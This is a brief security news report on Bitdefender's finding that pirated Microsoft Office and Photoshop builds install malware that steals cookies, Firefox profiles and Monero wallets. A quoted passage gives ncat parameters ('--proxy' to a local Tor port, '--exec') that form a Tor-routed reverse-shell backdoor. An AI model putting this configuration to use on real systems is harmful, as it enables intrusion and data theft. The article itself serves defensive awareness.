Pirated Microsoft Office and Adobe Photoshop Steal Data and Cryptocurrency

Security experts at Bitdefender have warned that cracked copies of Microsoft Office and Adobe Photoshop are stealing browser cookies and Monero cryptocurrency wallet data from users who install pirated software.

According to the specialists, some pirated versions of both programs come bundled with malware that steals browser session cookies (and in the case of Firefox, the entire user profile history), captures Monero cryptocurrency wallets, and extracts other data via BitTorrent. The malware first opens a backdoor on the target machine and disables the firewall.

Once the cracked program is launched, it installs an instance of ncat.exe (a legitimate tool for sending raw data over a network) and uses a batch file called chknap.bat, as well as a Tor proxy.

“These tools work together to create a powerful backdoor that exchanges data with a command-and-control server via Tor: the ncat binary listens on the Tor proxy port (--proxy 127.0.0.1:9075) and uses the --exec parameter, which allows all client input to be sent to the application, and responses to be sent back to the client through the socket (typical reverse shell behavior),” the researchers explain.

The malware operators behind this attack take considerable time to analyze the compromised environment and decide what is worth stealing. Analysts believe that stealing the entire Firefox profile was likely accidental rather than intentional, and that the attackers would target any other browser installed on the device as well.